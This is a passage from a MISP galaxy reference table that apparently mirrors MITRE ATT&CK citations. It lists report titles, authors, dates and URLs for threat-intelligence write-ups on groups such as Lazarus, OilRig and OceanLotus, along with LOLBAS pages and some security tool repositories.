The tag is: misp-galaxy:references="The Hacker News Lazarus Aug 2022"

Table 14734. Table References

Links

https://thehackernews.com/2022/08/north-korea-hackers-spotted-targeting.html

Zdnet Kimsuky Group September 2020

Cimpanu, C. (2020, September 30). North Korea has tried to hack 11 officials of the UN Security Council. Retrieved November 4, 2020.

The tag is: misp-galaxy:references="Zdnet Kimsuky Group September 2020"

Table 14735. Table References

Links

https://www.zdnet.com/article/north-korea-has-tried-to-hack-11-officials-of-the-un-security-council/

Volexity InkySquid BLUELIGHT August 2021

Cash, D., Grunzweig, J., Meltzer, M., Adair, S., Lancaster, T. (2021, August 17). North Korean APT InkySquid Infects Victims Using Browser Exploits. Retrieved September 30, 2021.

The tag is: misp-galaxy:references="Volexity InkySquid BLUELIGHT August 2021"

Table 14736. Table References

Links

https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/

Talos Kimsuky Nov 2021

An, J. and Malhotra, A. (2021, November 10). North Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets. Retrieved December 29, 2021.

The tag is: misp-galaxy:references="Talos Kimsuky Nov 2021"

Table 14737. Table References

Links

https://blog.talosintelligence.com/2021/11/kimsuky-abuses-blogs-delivers-malware.html

Volexity InkySquid RokRAT August 2021

Cash, D., Grunzweig, J., Adair, S., Lancaster, T. (2021, August 25). North Korean BLUELIGHT Special: InkySquid Deploys RokRAT. Retrieved October 1, 2021.

The tag is: misp-galaxy:references="Volexity InkySquid RokRAT August 2021"

Table 14738. Table References

Links

https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/

Lazarus APT January 2022

Saini, A. and Hossein, J. (2022, January 27). North Korea’s Lazarus APT leverages Windows Update client, GitHub in latest campaign. Retrieved January 27, 2022.

The tag is: misp-galaxy:references="Lazarus APT January 2022"

Table 14739. Table References

Links

https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/

Github NoRunDll

gtworek. (2019, December 17). NoRunDll. Retrieved August 23, 2021.

The tag is: misp-galaxy:references="Github NoRunDll"

Table 14740. Table References

Links

https://github.com/gtworek/PSBits/tree/master/NoRunDll

CrowdStrike Scattered Spider SIM Swapping December 22 2022

Tim Parisi. (2022, December 22). Not a SIMulation: CrowdStrike Investigations Reveal Intrusion Campaign Targeting Telco and BPO Companies. Retrieved September 14, 2023.

The tag is: misp-galaxy:references="CrowdStrike Scattered Spider SIM Swapping December 22 2022"

Table 14741. Table References

Links

https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/

Crowdstrike TELCO BPO Campaign December 2022

Parisi, T. (2022, December 2). Not a SIMulation: CrowdStrike Investigations Reveal Intrusion Campaign Targeting Telco and BPO Companies. Retrieved June 30, 2023.

The tag is: misp-galaxy:references="Crowdstrike TELCO BPO Campaign December 2022"

Table 14742. Table References

Links

https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/

Sophos Dyreza April 2015

Ducklin, P. (2015, April 20). Notes from SophosLabs: Dyreza, the malware that discriminates against old computers. Retrieved June 16, 2020.

The tag is: misp-galaxy:references="Sophos Dyreza April 2015"

Table 14743. Table References

Links

https://nakedsecurity.sophos.com/2015/04/20/notes-from-sophoslabs-dyreza-the-malware-that-discriminates-against-old-computers/

NIST Supply Chain 2012

Boyens, J., et al. (2002, October). Notional Supply Chain Risk Management Practices for Federal Information Systems. Retrieved April 6, 2018.

The tag is: misp-galaxy:references="NIST Supply Chain 2012"

Table 14744. Table References

Links

http://dx.doi.org/10.6028/NIST.IR.7622

eSentire FIN7 July 2021

eSentire. (2021, July 21). Notorious Cybercrime Gang, FIN7, Lands Malware in Law Firm Using Fake Legal Complaint Against Jack Daniels’ Owner, Brown-Forman Inc. Retrieved September 20, 2021.

The tag is: misp-galaxy:references="eSentire FIN7 July 2021"

Table 14745. Table References

Links

https://www.esentire.com/security-advisories/notorious-cybercrime-gang-fin7-lands-malware-in-law-firm-using-fake-legal-complaint-against-jack-daniels-owner-brown-forman-inc

Secureworks NotPetya June 2017

Counter Threat Research Team. (2017, June 28). NotPetya Campaign: What We Know About the Latest Global Ransomware Attack. Retrieved June 11, 2020.

The tag is: misp-galaxy:references="Secureworks NotPetya June 2017"

Table 14746. Table References

Links

https://www.secureworks.com/blog/notpetya-campaign-what-we-know-about-the-latest-global-ransomware-attack

SensePost NotRuler

SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019.

The tag is: misp-galaxy:references="SensePost NotRuler"

Table 14747. Table References

Links

https://github.com/sensepost/notruler

FireEye APT29 Nov 2018

Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.

The tag is: misp-galaxy:references="FireEye APT29 Nov 2018"

Table 14748. Table References

Links

https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html

NT API Windows

The NTinternals.net team. (n.d.). Nowak, T. Retrieved June 25, 2020.

The tag is: misp-galaxy:references="NT API Windows"

Table 14749. Table References

Links

https://undocumented.ntinternals.net/

Npcap: Windows Packet Capture Library & Driver

Npcap. (n.d.). Npcap: Windows Packet Capture Library & Driver. Retrieved September 7, 2023.

The tag is: misp-galaxy:references="Npcap: Windows Packet Capture Library & Driver"

Table 14750. Table References

Links

https://npcap.com/

NPLogonNotify

Microsoft. (2021, October 21). NPLogonNotify function (npapi.h). Retrieved March 30, 2023.

The tag is: misp-galaxy:references="NPLogonNotify"

Table 14751. Table References

Links

https://learn.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nplogonnotify

NPPSPY

Grzegorz Tworek. (2021, December 15). NPPSpy. Retrieved March 30, 2023.

The tag is: misp-galaxy:references="NPPSPY"

Table 14752. Table References

Links

https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy

ntdsutil.exe - LOLBAS Project

LOLBAS. (2020, January 10). ntdsutil.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="ntdsutil.exe - LOLBAS Project"

Table 14753. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Ntdsutil/

Ntdsutil Microsoft

Microsoft. (2016, August 31). Ntdsutil Microsoft. Retrieved July 11, 2023.

The tag is: misp-galaxy:references="Ntdsutil Microsoft"

Table 14754. Table References

Links

https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc753343(v=ws.11)

Microsoft NTFS File Attributes Aug 2010

Hughes, J. (2010, August 25). NTFS File Attributes. Retrieved March 21, 2018.

The tag is: misp-galaxy:references="Microsoft NTFS File Attributes Aug 2010"

Table 14755. Table References

Links

https://blogs.technet.microsoft.com/askcore/2010/08/25/ntfs-file-attributes/

NtQueryInformationProcess

Microsoft. (2021, November 23). NtQueryInformationProcess function (winternl.h). Retrieved February 4, 2022.

The tag is: misp-galaxy:references="NtQueryInformationProcess"

Table 14756. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess

AsyncRAT GitHub

Nyan-x-Cat. (n.d.). NYAN-x-CAT / AsyncRAT-C-Sharp. Retrieved October 3, 2023.

The tag is: misp-galaxy:references="AsyncRAT GitHub"

Table 14757. Table References

Links

https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/blob/master/README.md

Joe Sec Nymaim

Joe Security. (2016, April 21). Nymaim - evading Sandboxes with API hammering. Retrieved September 30, 2021.

The tag is: misp-galaxy:references="Joe Sec Nymaim"

Table 14758. Table References

Links

https://www.joesecurity.org/blog/3660886847485093803

OWASP Fingerprinting

OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="OWASP Fingerprinting"

Table 14759. Table References

Links

https://wiki.owasp.org/index.php/OAT-004_Fingerprinting

OWASP Vuln Scanning

OWASP. (n.d.). OAT-014 Vulnerability Scanning. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="OWASP Vuln Scanning"

Table 14760. Table References

Links

https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning

BlackHat API Packers

Choi, S. (2015, August 6). Obfuscated API Functions in Modern Packers. Retrieved August 22, 2022.

The tag is: misp-galaxy:references="BlackHat API Packers"

Table 14761. Table References

Links

https://www.blackhat.com/docs/us-15/materials/us-15-Choi-API-Deobfuscator-Resolving-Obfuscated-API-Functions-In-Modern-Packers.pdf

FireEye Obfuscation June 2017

Bohannon, D. & Carr, N. (2017, June 30). Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques. Retrieved February 12, 2018.

The tag is: misp-galaxy:references="FireEye Obfuscation June 2017"

Table 14762. Table References

Links

https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html

objective-see 2017 review

Patrick Wardle. (n.d.). Retrieved March 20, 2018.

The tag is: misp-galaxy:references="objective-see 2017 review"

Table 14763. Table References

Links

https://objective-see.com/blog/blog_0x25.html

Talos Oblique RAT March 2021

Malhotra, A. (2021, March 2). ObliqueRAT returns with new campaign using hijacked websites. Retrieved September 2, 2021.

The tag is: misp-galaxy:references="Talos Oblique RAT March 2021"

Table 14764. Table References

Links

https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html

IBM ITG07 June 2019

McMillen, D., Sperry, C. (2019, June 14). Observations of ITG07 Cyber Operations. Retrieved May 17, 2021.

The tag is: misp-galaxy:references="IBM ITG07 June 2019"

Table 14765. Table References

Links

https://securityintelligence.com/posts/observations-of-itg07-cyber-operations/

Palo Alto CVE-2015-3113 July 2015

Falcone, R. and Wartell, R. (2015, July 27). Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved January 22, 2016.

The tag is: misp-galaxy:references="Palo Alto CVE-2015-3113 July 2015"

Table 14766. Table References

Links

http://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/

Volexity OceanLotus Nov 2017

Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017.

The tag is: misp-galaxy:references="Volexity OceanLotus Nov 2017"

Table 14767. Table References

Links

https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/

Volexity Ocean Lotus November 2020

Adair, S. and Lancaster, T. (2020, November 6). OceanLotus: Extending Cyber Espionage Operations Through Fake Websites. Retrieved November 20, 2020.

The tag is: misp-galaxy:references="Volexity Ocean Lotus November 2020"

Table 14768. Table References

Links

https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/

OceanLotus for OS X

Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017.

The tag is: misp-galaxy:references="OceanLotus for OS X"

Table 14769. Table References

Links

https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update

ESET OceanLotus macOS April 2019

Dumont, R. (2019, April 9). OceanLotus: macOS malware update. Retrieved April 15, 2019.

The tag is: misp-galaxy:references="ESET OceanLotus macOS April 2019"

Table 14770. Table References

Links

https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/

ESET OceanLotus

Foltýn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.

The tag is: misp-galaxy:references="ESET OceanLotus"

Table 14771. Table References

Links

https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/

Securelist Octopus Oct 2018

Kaspersky Lab’s Global Research & Analysis Team. (2018, October 15). Octopus-infested seas of Central Asia. Retrieved November 14, 2018.

The tag is: misp-galaxy:references="Securelist Octopus Oct 2018"

Table 14772. Table References

Links

https://securelist.com/octopus-infested-seas-of-central-asia/88200/

LOLBAS Odbcconf

LOLBAS. (n.d.). Odbcconf.exe. Retrieved March 7, 2019.

The tag is: misp-galaxy:references="LOLBAS Odbcconf"

Table 14773. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/

Microsoft odbcconf.exe

Microsoft. (2017, January 18). ODBCCONF.EXE. Retrieved March 7, 2019.

The tag is: misp-galaxy:references="Microsoft odbcconf.exe"

Table 14774. Table References

Links

https://docs.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-2017

GrimBlog UsernameEnum

GrimHacker. (2017, July 24). Office365 ActiveSync Username Enumeration. Retrieved December 9, 2021.

The tag is: misp-galaxy:references="GrimBlog UsernameEnum"

Table 14775. Table References

Links

https://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/

GitHub Office 365 User Enumeration

gremwell. (2020, March 24). Office 365 User Enumeration. Retrieved May 27, 2022.

The tag is: misp-galaxy:references="GitHub Office 365 User Enumeration"

Table 14776. Table References

Links

https://github.com/gremwell/o365enum

GitHub Office-Crackros Aug 2016

Carr, N. (2016, August 14). OfficeCrackros. Retrieved February 12, 2018.

The tag is: misp-galaxy:references="GitHub Office-Crackros Aug 2016"

Table 14777. Table References

Links

https://github.com/itsreallynick/office-crackros

GlobalDotName Jun 2019

Shukrun, S. (2019, June 2). Office Templates and GlobalDotName - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.

The tag is: misp-galaxy:references="GlobalDotName Jun 2019"

Table 14778. Table References

Links

https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique

Microsoft VBA

Microsoft. (2019, June 11). Office VBA Reference. Retrieved June 23, 2020.

The tag is: misp-galaxy:references="Microsoft VBA"

Table 14779. Table References

Links

https://docs.microsoft.com/office/vba/api/overview/

OfflineScannerShell.exe - LOLBAS Project

LOLBAS. (2021, August 16). OfflineScannerShell.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="OfflineScannerShell.exe - LOLBAS Project"

Table 14780. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/

Bitdefender Agent Tesla April 2020

Arsene, L. (2020, April 21). Oil & Gas Spearphishing Campaigns Drop Agent Tesla Spyware in Advance of Historic OPEC+ Deal. Retrieved May 19, 2020.

The tag is: misp-galaxy:references="Bitdefender Agent Tesla April 2020"

Table 14781. Table References

Links

https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-advance-of-historic-opec-deal/

Palo Alto OilRig April 2017

Falcone, R. (2017, April 27). OilRig Actors Provide a Glimpse into Development and Testing Efforts. Retrieved May 3, 2017.

The tag is: misp-galaxy:references="Palo Alto OilRig April 2017"

Table 14782. Table References

Links

http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/

OilRig New Delivery Oct 2017

Falcone, R. and Lee, B. (2017, October 9). OilRig Group Steps Up Attacks with New Delivery Documents and New Injector Trojan. Retrieved January 8, 2018.

The tag is: misp-galaxy:references="OilRig New Delivery Oct 2017"

Table 14783. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/10/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/

Palo Alto OilRig Oct 2016

Grunzweig, J. and Falcone, R. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017.

The tag is: misp-galaxy:references="Palo Alto OilRig Oct 2016"

Table 14784. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/

Unit 42 OilRig Sept 2018

Falcone, R., et al. (2018, September 04). OilRig Targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September 24, 2018.

The tag is: misp-galaxy:references="Unit 42 OilRig Sept 2018"

Table 14785. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/

Unit42 RDAT July 2020

Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020.

The tag is: misp-galaxy:references="Unit42 RDAT July 2020"

Table 14786. Table References

Links

https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/

Unit 42 QUADAGENT July 2018

Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.

The tag is: misp-galaxy:references="Unit 42 QUADAGENT July 2018"

Table 14787. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/

OilRig ISMAgent July 2017

Falcone, R. and Lee, B. (2017, July 27). OilRig Uses ISMDoor Variant; Possibly Linked to Greenbug Threat Group. Retrieved January 8, 2018.

The tag is: misp-galaxy:references="OilRig ISMAgent July 2017"

Table 14788. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/

Unit 42 RGDoor Jan 2018

Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor on Targets in the Middle East. Retrieved July 6, 2018.

The tag is: misp-galaxy:references="Unit 42 RGDoor Jan 2018"

Table 14789. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/

Palo Alto OilRig Sep 2018

Wilhoit, K. and Falcone, R. (2018, September 12). OilRig Uses Updated BONDUPDATER to Target Middle Eastern Government. Retrieved February 18, 2019.

The tag is: misp-galaxy:references="Palo Alto OilRig Sep 2018"

Table 14790. Table References

Links

https://unit42.paloaltonetworks.com/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/

ESET Okrum July 2019

Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.

The tag is: misp-galaxy:references="ESET Okrum July 2019"

Table 14791. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf

Talos Agent Tesla Oct 2018

Brumaghin, E., et al. (2018, October 15). Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox. Retrieved November 5, 2018.

The tag is: misp-galaxy:references="Talos Agent Tesla Oct 2018"

Table 14792. Table References

Links

https://blog.talosintelligence.com/2018/10/old-dog-new-tricks-analysing-new-rtf_15.html

Securelist Malware Tricks April 2017

Ishimaru, S. (2017, April 13). Old Malware Tricks To Bypass Detection in the Age of Big Data. Retrieved May 30, 2019.

The tag is: misp-galaxy:references="Securelist Malware Tricks April 2017"

Table 14793. Table References

Links

https://securelist.com/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/78010/

Red Canary Verclsid.exe

Haag, M., Levan, K. (2017, April 6). Old Phishing Attacks Deploy a New Methodology: Verclsid.exe. Retrieved August 10, 2020.

The tag is: misp-galaxy:references="Red Canary Verclsid.exe"

Table 14794. Table References

Links

https://redcanary.com/blog/verclsid-exe-threat-detection/

Talos Olympic Destroyer 2018

Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.

The tag is: misp-galaxy:references="Talos Olympic Destroyer 2018"

Table 14795. Table References

Links

https://blog.talosintelligence.com/2018/02/olympic-destroyer.html

Crowdstrike Pirate Panda April 2020

Busselen, M. (2020, April 7). On-demand Webcast: CrowdStrike Experts on COVID-19 Cybersecurity Challenges and Recommendations. Retrieved May 20, 2020.

The tag is: misp-galaxy:references="Crowdstrike Pirate Panda April 2020"

Table 14796. Table References

Links

https://www.crowdstrike.com/blog/on-demand-webcast-crowdstrike-experts-on-covid-19-cybersecurity-challenges-and-recommendations/

OneDriveStandaloneUpdater.exe - LOLBAS Project

LOLBAS. (2021, August 22). OneDriveStandaloneUpdater.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="OneDriveStandaloneUpdater.exe - LOLBAS Project"

Table 14797. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/

chasing_avaddon_ransomware

Hernandez, A. S. Tarter, P. Ocamp, E. J. (2022, January 19). One Source to Rule Them All: Chasing AVADDON Ransomware. Retrieved January 26, 2022.

The tag is: misp-galaxy:references="chasing_avaddon_ransomware"

Table 14798. Table References

Links

https://www.mandiant.com/resources/chasing-avaddon-ransomware

Onion Routing

Wikipedia. (n.d.). Onion Routing. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="Onion Routing"

Table 14799. Table References

Links

https://en.wikipedia.org/wiki/Onion_routing

FireEye FIN7 Aug 2018

Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018.

The tag is: misp-galaxy:references="FireEye FIN7 Aug 2018"

Table 14800. Table References

Links

https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html

OSX.FairyTale

Phil Stokes. (2018, September 20). On the Trail of OSX.FairyTale | Adware Playing at Malware. Retrieved August 24, 2021.

The tag is: misp-galaxy:references="OSX.FairyTale"

Table 14801. Table References

Links

https://www.sentinelone.com/blog/trail-osx-fairytale-adware-playing-malware/

Unit 42 OopsIE! Feb 2018

Lee, B., Falcone, R. (2018, February 23). OopsIE! OilRig Uses ThreeDollars to Deliver New Trojan. Retrieved July 16, 2018.

The tag is: misp-galaxy:references="Unit 42 OopsIE! Feb 2018"

Table 14802. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/

Proofpoint ZeroT Feb 2017

Huss, D., et al. (2017, February 2). Oops, they did it again: APT Targets Russia and Belarus with ZeroT and PlugX. Retrieved April 5, 2018.

The tag is: misp-galaxy:references="Proofpoint ZeroT Feb 2017"

Table 14803. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx

OpenConsole.exe - LOLBAS Project

LOLBAS. (2022, June 17). OpenConsole.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="OpenConsole.exe - LOLBAS Project"

Table 14804. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/OpenConsole/

Open Login Items Apple

Apple. (n.d.). Open items automatically when you log in on Mac. Retrieved October 1, 2021.

The tag is: misp-galaxy:references="Open Login Items Apple"

Table 14805. Table References

Links

https://support.apple.com/guide/mac-help/open-items-automatically-when-you-log-in-mh15189/mac

Operating with EmPyre

rvrsh3ll. (2016, May 18). Operating with EmPyre. Retrieved July 12, 2017.

The tag is: misp-galaxy:references="Operating with EmPyre"

Table 14806. Table References

Links

https://medium.com/rvrsh3ll/operating-with-empyre-ea764eda3363

Windows AppleJeus GReAT

Global Research & Analysis Team, Kaspersky Lab (GReAT). (2018, August 23). Operation AppleJeus: Lazarus hits cryptocurrency exchange with fake installer and macOS malware. Retrieved September 27, 2022.

The tag is: misp-galaxy:references="Windows AppleJeus GReAT"

Table 14807. Table References

Links

https://securelist.com/operation-applejeus/87553/

Novetta Blockbuster Destructive Malware

Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.

The tag is: misp-galaxy:references="Novetta Blockbuster Destructive Malware"

Table 14808. Table References

Links

https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf

Novetta Blockbuster Loaders

Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Loaders, Installers and Uninstallers Report. Retrieved March 2, 2016.

The tag is: misp-galaxy:references="Novetta Blockbuster Loaders"

Table 14809. Table References

Links

https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf

Novetta Blockbuster RATs

Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Remote Administration Tools & Content Staging Malware Report. Retrieved March 16, 2016.

The tag is: misp-galaxy:references="Novetta Blockbuster RATs"

Table 14810. Table References

Links

https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf

Novetta Blockbuster Tools

Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Tools Report. Retrieved March 10, 2016.

The tag is: misp-galaxy:references="Novetta Blockbuster Tools"

Table 14811. Table References

Links

https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Tools-Report.pdf

Novetta Blockbuster

Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.

The tag is: misp-galaxy:references="Novetta Blockbuster"

Table 14812. Table References

Links

https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf

FireEye Clandestine Wolf

Eng, E., Caselden, D. (2015, June 23). Operation Clandestine Wolf – Adobe Flash Zero-Day in APT3 Phishing Campaign. Retrieved January 14, 2016.

The tag is: misp-galaxy:references="FireEye Clandestine Wolf"

Table 14813. Table References

Links

https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html

Cylance Cleaver

Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.

The tag is: misp-galaxy:references="Cylance Cleaver"

Table 14814. Table References

Links

https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf

PWC Cloud Hopper April 2017

PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017.

The tag is: misp-galaxy:references="PWC Cloud Hopper April 2017"

Table 14815. Table References

Links

https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf

PWC Cloud Hopper Technical Annex April 2017

PwC and BAE Systems. (2017, April). Operation Cloud Hopper: Technical Annex. Retrieved April 13, 2017.

The tag is: misp-galaxy:references="PWC Cloud Hopper Technical Annex April 2017"

Table 14816. Table References

Links

https://www.pwc.co.uk/cyber-security/pdf/pwc-uk-operation-cloud-hopper-technical-annex-april-2017.pdf

Cybereason Cobalt Kitty 2017

Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.

The tag is: misp-galaxy:references="Cybereason Cobalt Kitty 2017"

Table 14817. Table References

Links

https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf

Cybereason Oceanlotus May 2017

Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018.

The tag is: misp-galaxy:references="Cybereason Oceanlotus May 2017"

Table 14818. Table References

Links

https://www.cybereason.com/blog/operation-cobalt-kitty-apt

Cybereason OperationCuckooBees May 2022

Cybereason Nocturnus. (2022, May 4). Operation CuckooBees: Deep-Dive into Stealthy Winnti Techniques. Retrieved September 22, 2022.

The tag is: misp-galaxy:references="Cybereason OperationCuckooBees May 2022"

Table 14819. Table References

Links

https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques

Securelist ScarCruft Jun 2016

Raiu, C., and Ivanov, A. (2016, June 17). Operation Daybreak. Retrieved February 15, 2018.

The tag is: misp-galaxy:references="Securelist ScarCruft Jun 2016"

Table 14820. Table References

Links

https://securelist.com/operation-daybreak/75100/

FireEye Operation Double Tap

Moran, N., et al. (2014, November 21). Operation Double Tap. Retrieved January 14, 2016.

The tag is: misp-galaxy:references="FireEye Operation Double Tap"

Table 14821. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html

ClearSky Lazarus Aug 2020

ClearSky Research Team. (2020, August 13). Operation 'Dream Job' Widespread North Korean Espionage Campaign. Retrieved December 20, 2021.

The tag is: misp-galaxy:references="ClearSky Lazarus Aug 2020"

Table 14822. Table References

Links

https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf

Cylance Dust Storm

Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.

The tag is: misp-galaxy:references="Cylance Dust Storm"

Table 14823. Table References

Links

https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf

DustySky

ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.

The tag is: misp-galaxy:references="DustySky"

Table 14824. Table References

Links

https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf

DustySky2

ClearSky Cybersecurity. (2016, June 9). Operation DustySky - Part 2. Retrieved August 3, 2016.

The tag is: misp-galaxy:references="DustySky2"

Table 14825. Table References

Links

http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.2016_TLP_White.pdf

Trend Micro Tick November 2019

Chen, J. et al. (2019, November). Operation ENDTRADE: TICK’s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020.

The tag is: misp-galaxy:references="Trend Micro Tick November 2019"

Table 14826. Table References

Links

https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf

FireEye DeputyDog 9002 November 2013

